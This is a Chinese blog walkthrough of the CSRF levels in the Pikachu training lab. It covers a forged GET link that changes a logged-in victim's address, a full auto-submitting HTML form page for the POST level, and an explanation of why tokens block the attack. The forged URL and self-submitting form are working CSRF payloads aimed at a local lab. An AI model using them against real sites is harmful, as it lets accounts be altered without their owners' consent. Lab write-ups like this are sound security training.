Pikachu靶场:CSRF(GET)、CSRF(POST)以及CSRF(token)

最新推荐文章于 2025-09-27 09:26:54 发布
原创 最新推荐文章于 2025-09-27 09:26:54 发布 · 5.1k 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#信息安全

本文通过Pikachu靶场详细介绍了CSRF攻击原理及三种实施方式:GET请求、POST请求和带token的请求。展示了如何利用伪造链接及恶意网站进行攻击,并探讨了使用token作为防御手段的有效性。

Pikachu靶场:CSRF(GET)、CSRF(POST)以及CSRF(token)

实验环境以及工具

Firefox浏览器、Burp Suite、Pikachu靶场

实验原理

Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。

CSRF的主要问题是敏感操作的链接容易被伪造,那么如何让这个链接不容易被伪造?
每次请求,都增加一个随机码(需要够随机,不容易伪造),后台每次对这个随机码进行验证!

具体实施

CSRF(GET)

1.受害者登录

用户lucy登录

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-caIJ7QEN-1618736504967)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210418154327648.png)]

修改手机号为123456789住址usa为wuhan邮箱改为lucy@163.com

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CybcgrCq-1618736504969)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210418155146838.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RGiSzbQg-1618736504971)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210418155325034.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HxtKIUy1-1618736504974)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210418155358964.png)]

2.伪造链接

将GET请求复制下来

GET /Pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=123456789&add=wuhan&email=lucy%40163.com&submit=submit

修改部分内容,这里吧住址wuhan改为beijing并改成URL发送

http://127.0.0.1/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=123456789&add=beijing&email=lucy%40163.com&submit=submit

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hlqlwUT1-1618736504975)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210418160752506.png)]

CSRF(POST)

1.受害者登录

受害者修改住址为wuhan

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-zBp5B7M1-1618736504977)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210418163207055.png)]

这样就不能利用在URL修改信息来篡改受害者信息。

2.搭建恶意网站

搭建一个恶意网站将受害者信息进行修改,这里是将住址从wuhan改为hubei

<html>
<head>
<script>
window.onload = function() {
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://127.0.0.1/pikachu/vul/csrf/csrfpost/csrf_post_edit.php">
    <input id="sex" type="text" name="sex" value="girl" />
    <input id="phonenum" type="text" name="phonenum" value="123456789" />
    <input id="add" type="text" name="add" value="hubei" />
    <input id="email" type="text" name="email" value="lucy@163.com" />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

并将恶意网站URL发送给受害者

http://127.0.0.1/Pikachu/vul/csrf/csrfpost/post123.html

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QG51sTsZ-1618736504978)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210418164416736.png)]

成功修改了受害者的信息。

CSRF(token)

受害者登录并将住址修改为wuhan

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KCu5bz7f-1618736504979)(C:\Users\freedom\AppData\Roaming\Typora\typora-user-images\image-20210418164842346.png)]

GET /pikachu/vul/csrf/csrftoken/token_get_edit.php?
sex=lucy
&phonenum=123456789
&add=wuhan
&email=lucy%40163.com
&token=15902607bf21f29fd3019665073
&submit=submit HTTP/1.1

其中token的值每次请求都会发生变化,所以攻击者不能用自己的token对受害者进行攻击。

总结

CSRF是借用受害者的权力进行攻击,与xss和其他越权漏洞不同,它没有实质性的拥有受害者的权力。CSRF的攻击条件非常苛刻,需要目标网站有CSRF漏洞,要受害者进行登录,受害者点击恶意链接。token能够很好的防御CSRF攻击。

pikachu平台之csrf
qq_42728977的博客
12-16 2226
概述 参考链接 CSRF 是 Cross Site Request Forgery 的 简称,中文名为跨域请求伪造,在CSRF的攻击场景中,攻击者会伪造一个请求(一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,这个攻击也就完成了,所以CSRF攻击也被称为“one click”攻击。 场景例子 lucy想要在购物网站上修改购物地址,这个操作是lucy通过浏览器向后端发送了请求。...
pikachu靶场-3 跨站请求伪造(CSRF
weixin_52180702的博客
12-12 768
这个get请求实际上是向后台传递了刚才的所有参数,而且我们并没有在这个提交的参数里看到csrf token,也就是说后台这里是没有做一些防CSRF的措施的,同时他又是通过get请求来提交的,如果有人相对它进行修改,他就只需要获取到这个链接,然后就可以对一些地方进行修改,然后通过邮件,聊天工具等发送给受害者,受害者点击后就会被修改信息。get型的CSRF是比较好利用的,我们只需要伪造这个链接,然后把我们想要修改的参数修改掉,然后发送给带登录态的攻击者,他只要点击,这个请求就完成了,这个攻击也完成了。
PortSwigger web实验室-CSRF(BP靶场)
2301_79933930的博客
09-27 1252
Hello 大家好!这篇笔记我将分享在 BP 靶场学习 CSRF 时的一些思路和总结,主要围绕解题过程中的关键细节、常见绕过方式以及容易忽略的点。我会尽量把每一步讲清楚,方便大家理解。如果有不完善的地方,欢迎指出,我们一起讨论、共同进步!希望这篇内容能为正在学习 CSRF 的你带来一些启发~ (▀̿Ĺ̯▀̿ ̿)本次关于 BP 靶场中关于 CSRF 的学习分享就到这里啦~感兴趣的同学可以关注我哦!后续还会继续更新其他板块的学习内容⁂((✪⥎✪))⁂。
pikachu靶场CSRF
2401_87588238的博客
08-24 1013
CSRF攻击需要两个条件:用户已登录目标网站并保存登录凭证,以及被诱骗访问恶意页面。GET型攻击通过伪造URL诱导用户点击;POST型攻击则通过隐藏表单自动提交。有效的防护手段是使用CSRF Token,服务器为每个会话生成唯一Token并验证请求合法性,未通过验证的请求将被拒绝,从而防止攻击。Token需动态更新并嵌入表单,确保每次请求都携带有效凭证。
Pikachu靶场——跨站请求伪造(CSRF)
来日可期的博客
10-07 2328
全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密码等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。
pikachu~~~CSRF(get,post,token)
weixin_50339832的博客
06-06 1906
GET /pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=dv&phonenum=num&add=beijing&email=kobe%40pikachu.com&submit=submit HTTP/1.1
pikachu靶场-CSRF
2302_79841575的博客
08-24 1386
CSRF(跨站请求伪造)是一种利用用户身份进行恶意操作的攻击方式。攻击者诱导用户点击伪造链接或访问恶意页面,利用浏览器自动携带cookie的特性,以用户身份执行非授权操作。文章通过银行转账案例和Pikachu靶场实验,演示了GET/POST两种方式的CSRF攻击实现,以及防御措施——Token验证机制的工作原理:服务器生成随机Token存入Session和表单,提交时验证Token一致性后销毁,从而有效防止CSRF攻击。
Pikachu靶场CSRF漏洞详解
热门推荐
m0_46467017的博客
05-16 1万+
Pikachu靶场之XSS漏洞详解前言漏洞简述CSRF是什么CSRF攻击原理CSRF攻击防护如何确认一个web系统存在CSRF漏洞第1关 CSRF(get)第2关 CSRF(post)第三关 CSRF Tokentoken验证原理其他防范措施 前言 本篇文章用于巩固对自己csrf漏洞的学习总结,其中部分内容借鉴了以下博客。 链接: pikachu CSRF(跨站请求伪造) (皮卡丘漏洞平台通关系列) 链接: Pikachu漏洞靶场系列之CSRF 漏洞简述 CSRF是什么 CSRF全称为跨站请求伪造(Cro
(1)Pikachu靶场CSRF题目:CSRF(get),CSRF(post),CSRF(token);
最新发布
10-01
<form action="http://127.0.0.1/pikachu/pikachu/vul/csrf/csrftoken/token_get_edit.php"> 地球" /> <input type="hidden" name="token" value=" 8435167164708b47bf435862252" /> history.pushState('', '...
pikachu靶场练习——CSRF详解
qq_42176496的博客
09-05 3204
pikachu靶场——CSRF详解
pikachu靶场通关笔记17 CSRF关卡03-CSRF(Token
mooyuan的网络安全博客
06-06 1670
本系列为通过《pikachu靶场通关笔记》的CSRF关卡(共3关)渗透集合,通过对CSRF关卡源码的代码审计找到安全风险的真实原因,讲解CSRF原理并进行渗透实践,本文为CSRF03关卡XSS之Token关卡的渗透部分。
pikachu靶场CSRFTOKEN绕过
黄乔国PHP
03-08 3591
Pikachu靶场中的CSRF漏洞环节里面有一关CSRF TOKEN,这个关卡和其余关卡稍微有点不一样,因为表单里面存在一个刷新就会变化的token,那么这个token是否能绕过呢?接下来我们来仔细分析分析。
pikachu靶场通关笔记15 CSRF关卡01-CSRF(GET)
mooyuan的网络安全博客
06-05 1648
本系列为通过《pikachu靶场通关笔记》的CSRF关卡(共3关)渗透集合,通过对CSRF关卡源码的代码审计找到CSRF安全风险的真实原因,讲解CSRF原理并进行渗透实践,本文为CSRF01关卡XSS之GET关卡的渗透部分。
D5 pikachu CSRF Token
m0_60071324的博客
07-30 263
增加token验证:对关键操作增加token参数,长度足够,每次不一样 关于安全的绘画管理: 不在客户端保存敏感信息 测试直接关闭 设置会话过期机制如自动登录超时 增加验证码: 为了防止暴力破解,可以用在其他重要信息表单中 敏感信息的修改使用post而不是get ...
pikachu靶场CSRF-token测试报告
ccc_9wy的博客
10-22 1134
pikachu靶场渗透;csrf漏洞复现;web漏洞;网络安全;身份验证;含有tokencsrf绕过方法;token泄露;
pikachu靶场通关笔记16 CSRF关卡02-CSRF(POST)
mooyuan的网络安全博客
06-05 1368
本系列为通过《pikachu靶场通关笔记》的CSRF关卡(共3关)渗透集合,通过对CSRF关卡源码的代码审计找到安全风险的真实原因,讲解CSRF原理并进行渗透实践,本文为CSRF02关卡XSS之POST关卡的渗透部分。
pikachu靶场中的CSRF、SSRF通关
qq_68163788的博客
05-26 2667
Pikachu靶场中,CSRF(Cross-Site Request Forgery)和SSRF(Server-Side Request Forgery)是两种常见的Web安全漏洞。CSRF攻击利用用户在已认证的Web应用程序上执行未经意的操作,通过伪装请求来执行恶意操作,例如更改用户密码或发送资金。而SSRF漏洞则允许攻击者从受害服务器上执行请求,可能导致访问内部系统、绕过防火墙或执行其他恶意操作。
pikachu靶场csrftoken)解题
z153300230的博客
04-12 686
刚接触安全的小白,最近在做pikachu靶场,关于csrftoken)这个题目 网上找了好久没有找到答案,于是乎自己来做一做。
pikachu靶场 CSRF
Al_1的博客
10-01 495
跨站请求伪造,get方式和post方式
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值